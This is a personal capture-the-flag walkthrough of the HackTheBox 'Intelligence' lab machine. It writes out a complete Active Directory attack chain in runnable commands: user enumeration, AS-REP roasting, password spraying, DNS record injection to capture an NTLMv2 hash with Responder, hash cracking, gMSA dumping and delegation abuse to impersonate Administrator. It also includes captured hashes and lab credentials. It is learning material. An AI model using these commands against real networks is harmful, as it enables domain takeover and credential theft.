🎭

Intelligence

53,80,135,139,445,636,3269,49692,49709
notion image
echo "10.129.95.154 intelligence.htb dc.intelligence.htb" >> /etc/hosts
run dir gobuster
notion image
The /documents page shows 403 forbidden, i tried bypassing ,but not work.
no subdomain found by gobuster.
smb anonymous
notion image
no interface found.
continue on 80 port.
found two pdf files.
notion image
translate:
Moreover, every one has his own way. It will never be achieved but achieved by hard work. Let him not seek any great thing. He wants more pain. Let the pain be with the pain, let it not be cut out of the ways. Because the pleasure of labor is the pain of pain. He likes the pain of the way he loves state They are looking for a great deal. He wants to make a great deal of money but gain gain Look for the times that are important and the times that are not. I do not have any further pain. He loves himself so much that he wants to ask. It's a lot of fun. Let him search for himself for a long time. La- Boredom is not followed by pain, but seeks ways to gain it. As his pain is the pain of any kind of pain. In a great way big It takes a lot of hard work to get them. Times will follow neither great manner nor great pain. It will never be great. Anyone who wants to be loved can be loved. I received no great pain He will follow him. As it is, some of his kind are hard at times. Not everyone there is no pain.
Painful as they fall, get some effort. Let him search with pain, and he will not care. I don't really want to go on like this. A great deal of pain, a great deal of gain, a great deal of pain. Some but his very pain is pleasure. Painful times are great times it is very The ways and means he will follow will never be his great will. It is pursued not by the will of the times, but by labor. He likes but the pleasure is with the work times. It will result in a great deal of pain, but it will be a pain in the ass. His pleasure is to be found. Gained, but the pain as they die, they do not die never Whatever the times may be pleasure. Never as a result of pain let anyone seek pain there. Times are painful and painful. I will continue to have a great time. It is a way to never feel pain or pain.
notion image
William.Lee Jose.Williams
kerbrute userenum --dc 10.129.95.154 username.txt -d intelligence.htb
notion image
found those two users exist
GetNPUsers.py intelligence.htb/ -usersfile username.txt -no-pass -request -dc-ip 10.129.95.154
notion image
pre-auth unset for those two users.
According to previous .pdf file, they are named by date and stored under /documents folder, so i wrote a python script to enumerate files under this folder.
import datetime import requests start_date = datetime.datetime(2020, 1, 1) end_date = datetime.datetime(2021, 7, 4) delta = datetime.timedelta(days=1) current_date = start_date while current_date <= end_date: url = current_date.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf") response = requests.get(url) if response.status_code == 200: print(url) current_date += delta
python3 enumeration.py >output
notion image
wget -i output
download all of them
convert all of them to text file
for i in *pdf; do pdftotext $i; done
notion image
Because the quantity is too large, i search sensitive words such as key,pass….
notion image
finally i found a file includes sensitive word ‘password’, and language is distinct from all other downloaded files.
grep -l "pass" *.txt 2020-06-04-upload.txt
┌─[✗]─[root@htb-veom2jynhn]─[/home/b3bop404/Desktop/pdf] └──╼ #cat 2020-06-04-upload.txt New Account Guide Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876 After logging in please change your password as soon as possible.
i get this credential NewIntelligenceCorpUser9876
but i don’t have a valid username for this credential
in this domain, all users are likelly named as [firstname].[lastname] due to previous experience on kerbrute userenum. So i’d like to extract all author name from those pdf files.
exiftool *.pdf | grep Creator | tr -d ' ' | awk -F ':' '{print $2}' >> ../userlist
notion image
try passwordspray attack on [username]:’NewIntelligenceCorpUser9876’
kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb userlist
notion image
all valid user, then moves on passwordspray
kerbrute passwordspray userlist NewIntelligenceCorpUser9876 --dc 10.129.95.154 -d intelligence.htb
notion image
not work
try smb enumeration
crackmapexec smb intelligence.htb -u userlist -p 'NewIntelligenceCorpUser9876'
notion image
found valid cred:
Tiffany.Molina:NewIntelligenceCorpUser9876
notion image
smbclient //10.129.95.154/Users -U intelligence.htb/Tiffany.Molina
Retrived the users flag from desktop
notion image
 
smbclient //10.129.95.154/IT -U intelligence.htb/Tiffany.Molina
notion image
found a powershell file under IT interface
downdetector.ps1: Little-endian UTF-16 Unicode text, with CRLF, LF line terminators
here is content
# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down" } } catch {} }
notion image
the script works constantly sending web requests to Active directory DNS record which start from web for checking status from the destination. Is there a way to trigger a spoofing on DNS and then get the detail info that send?
googling, i found dnstool.py .This tool can add/remove/modify Service Principal Names on accounts in AD over LDAP.
git clone https://github.com/dirkjanm/krbrelayx.git
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web111 -d 10.10.14.11 -t A
notion image
responder -I tun0
start listener..
wait for next round script execution.
Because i’m using htb pwnbox, 80 port is being occupied by python2.7. I switch back to my kali linux.
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.224.189 -a add -r web222 -d 10.10.16.13 -t A
notion image
[HTTP] NTLMv2 Client : 10.129.224.189 [HTTP] NTLMv2 Username : intelligence\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:b364c80df1ef91e1:DB28CD14E144EDF2CCE12B91B7536805:01010000000000001F3BA8685B6ADA014480D68E207B2B660000000002000800510056004700550001001E00570049004E002D003800530047003800430039004B0054005300490034000400140051005600470055002E004C004F00430041004C0003003400570049004E002D003800530047003800430039004B0054005300490034002E0051005600470055002E004C004F00430041004C000500140051005600470055002E004C004F00430041004C00080030003000000000000000000000000020000015F9094027228F59E49F80D2E2C49CDBECF32D90C142B7D3247E6A91C27355720A001000000000000000000000000000000000000900380048005400540050002F007700650062003200320032002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
received a hash from client , throw it into netcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
notion image
TedGraves:Mr.Teddy
notion image
evil-winrm -i intelligence.htb -u Ted.Graves -p 'Mr.Teddy'
failed
Try bloodhound
/bloodhound.py -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.129.128.237 -c All
notion image
notion image
gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb'
notion image
svc_int$:::d365e889367ce3e3241b120db1df6e25 svc_int$:aes256-cts-hmac-sha1-96:bdc4e5d502f64ffc7b7044c5a2ca5e41fe784866fcfa548b5b16dfdb73c30d63 svc_int$:aes128-cts-hmac-sha1-96:ce17e93d890939760b64a37bac296dd2
i tried crack, but it is not feasible
notion image
WWW/dc.intelligence.htb
notion image
notion image
getST.py -spn WWW/dc.intelligence.htb intelligence.htb/svc_int -hashes :d365e889367ce3e3241b120db1df6e25 -impersonate Administrator
notion image
notion image
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass intelligence.htb/administrator@dc.intelligence.htb or wmiexec.py dc.intelligence.htb -k -no-pass
notion image
rooted!